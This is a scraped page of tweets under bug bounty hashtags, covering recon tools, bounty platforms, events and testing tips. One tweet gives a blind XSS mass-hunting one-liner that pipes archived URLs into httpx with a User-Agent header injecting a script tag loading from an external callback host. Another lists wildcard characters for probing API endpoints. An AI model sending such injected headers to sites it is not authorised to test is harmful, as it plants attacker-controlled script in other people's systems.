HackGit(@hack_git) 's Twitter Profile Photo

The Time Machine

Weaponizing WaybackUrls for Recon, BugBounties, OSINT, Sensitive Endpoints and what not.

github.com/anmolksachan/T…

Details:
bit.ly/3MI9Llh

t.me/hackgit/8277

The Time Machine

Weaponizing WaybackUrls for Recon, BugBounties, OSINT, Sensitive Endpoints and what not.

github.com/anmolksachan/T…

Details:
bit.ly/3MI9Llh

#OSINT #infosec t.me/hackgit/8277
account_circle
Cybertix(@thecybertix) 's Twitter Profile Photo

𝘽𝙡𝙞𝙣𝙙 𝙓𝙎𝙎 𝙈𝙖𝙨𝙨 𝙃𝙪𝙣𝙩𝙞𝙣𝙜

cat domain.txt | waybackurls | httpx -H 'User-Agent: \'><script src=chirag.bxss.in></script>'

𝙎𝙪𝙗𝙨𝙘𝙧𝙞𝙗𝙚 𝙩𝙤 𝙤𝙪𝙧 𝙔𝙤𝙪𝙏𝙪𝙗𝙚 𝘾𝙝𝙖𝙣𝙣𝙚𝙡:
youtube.com/@cybertix

𝘽𝙡𝙞𝙣𝙙 𝙓𝙎𝙎 𝙈𝙖𝙨𝙨 𝙃𝙪𝙣𝙩𝙞𝙣𝙜

cat domain.txt | waybackurls | httpx -H 'User-Agent: \'><script src=chirag.bxss.in></script>'

𝙎𝙪𝙗𝙨𝙘𝙧𝙞𝙗𝙚 𝙩𝙤 𝙤𝙪𝙧  𝙔𝙤𝙪𝙏𝙪𝙗𝙚 𝘾𝙝𝙖𝙣𝙣𝙚𝙡:
youtube.com/@cybertix

#bugbountytips #hacks #bugbounties #security
account_circle
Hats.Finance 🦇🔊(@HatsFinance) 's Twitter Profile Photo

Pay with your Project's Token for and 🎩🔐

With Hats, you can encourage the use of your Native Token while securing your Protocol. Plus, as your token value rises, so do rewards, attracting more security researchers to review your code! 👀

Pay with your Project's Token for #BugBounties and #AuditCompetitions🎩🔐

With Hats, you can encourage the use of your Native Token while securing your Protocol. Plus, as your token value rises, so do rewards, attracting more security researchers to review your code! 👀
account_circle
ITandNerdy(@ITandNerdy) 's Twitter Profile Photo

I was very fortunate to meet STÖK ✌️ after his speech at DEF CON ✌️I love his YouTube videos and I used as a way to practice with tools and my methodology for in a real world environment. I hope to see you again!

31

I was very fortunate to meet @stokfredrik after his speech at @defcon ✌️I love his YouTube videos and I used #bugbounties as a way to practice with tools and my methodology for #pentesting in a real world environment. I hope to see you again!

#defcon #defcon31 #bugbounty
account_circle
Anirudh Anand(@a0xnirudh) 's Twitter Profile Photo

Hunting JavaScript files for by Vvek ~ blog.stackademic.com/hunting-javasc…

Beginners Guide on using in by Kathan Patel kathanp19.medium.com/beginners-guid…

Extensive JS Recon for : gist.github.com/fuckup1337/494…

Hunting JavaScript files for #Vulnerabilities by @VivekGhinaiya  blog.stackademic.com/hunting-javasc… 

Beginners Guide on using #Javascript in #BugBounty by @KathanP19  kathanp19.medium.com/beginners-guid… 

Extensive JS Recon for #BugBounties: gist.github.com/fuckup1337/494… #bugbountytips
account_circle
Web3 Builders Alliance(@ComeBuidlwithUs) 's Twitter Profile Photo

“Responsible stewardship of the blockchain” is a mantra. Static & bureaucratic are not enough to protect applications in the decentralized world. WBA <> FYEO are happy to announce . A WBA capstone by nahem 🐋🉐...🧵👇

gofyeo.com/sombrero

“Responsible stewardship of the blockchain” is a #WBA mantra.  Static & bureaucratic #bugbounties are not enough to protect applications in the decentralized world.  WBA <> @goFYEO are happy to announce  #SombreroProtocol.  A WBA capstone by @nahem...🧵👇

gofyeo.com/sombrero
account_circle
Lupin(@0xLupin) 's Twitter Profile Photo

I'm currently testing Chatbot UI 🔥

It's An amazing interface clone that uses OpenAI API with your own organisation key.

Let's dive into how it can help find vulnerabilities and contribute to 🕵️‍♀️

I'm currently testing Chatbot UI 🔥

It's An amazing #ChatGPT interface clone that uses @OpenAI API with your own organisation key. 

Let's dive into how it can help find vulnerabilities and contribute to #BugBounties 🕵️‍♀️
account_circle
Ninad Mishra(@NinadMishra5) 's Twitter Profile Photo

Just dropped a brand-new video where I take you through the essentials of Server-Side Request Forgery (SSRF), demonstrate how ChatGPT can generate SSRF-vulnerable code, and share effective mitigation techniques! 🚀
youtube.com/watch?v=_NSmeq…

account_circle
Root Moksha(@RootMoksha) 's Twitter Profile Photo

Wildcard parameter in web API Pentesting
Try to use the following symbols as wildcards: *, %, _, .
~ /api/users/*
~ /api/users/%
~ /api/users/_
~ /api/users/.

tip s tip

account_circle
BugBase(@BugBase) 's Twitter Profile Photo

Excited to announce our next event featuring Abhisek R, an experienced bug bounty hunter, who will delve into the world of bug bounties. 🚀

Date: 29/06/2023
Link: lu.ma/00a431ta

Excited to announce our next event featuring Abhisek R, an experienced bug bounty hunter, who will delve into the world of bug bounties. 🚀

Date: 29/06/2023
Link: lu.ma/00a431ta

#TheBugGyaanShow #BugBounties #CybersecurityWebinar #RegisterNow #bugbounty
account_circle
Kort(@Kort_seven) 's Twitter Profile Photo

💰📢 New Bug Bounty Platform AuditOne launching soon with 💰$1 000 000💵 USD bounty partnership with Aurora

🗓️ Start: August 16

must be secure for all users through community-driven , audits & insurance products

Hackers -> auditone.io/bug-bounty

💰📢 New Bug Bounty Platform @auditone_team launching soon with 💰$1 000 000💵 USD bounty partnership with @auroraisnear

🗓️ Start: August 16

#Web3 must be secure for all users through community-driven #bugbounties, audits & insurance products

Hackers -> auditone.io/bug-bounty
account_circle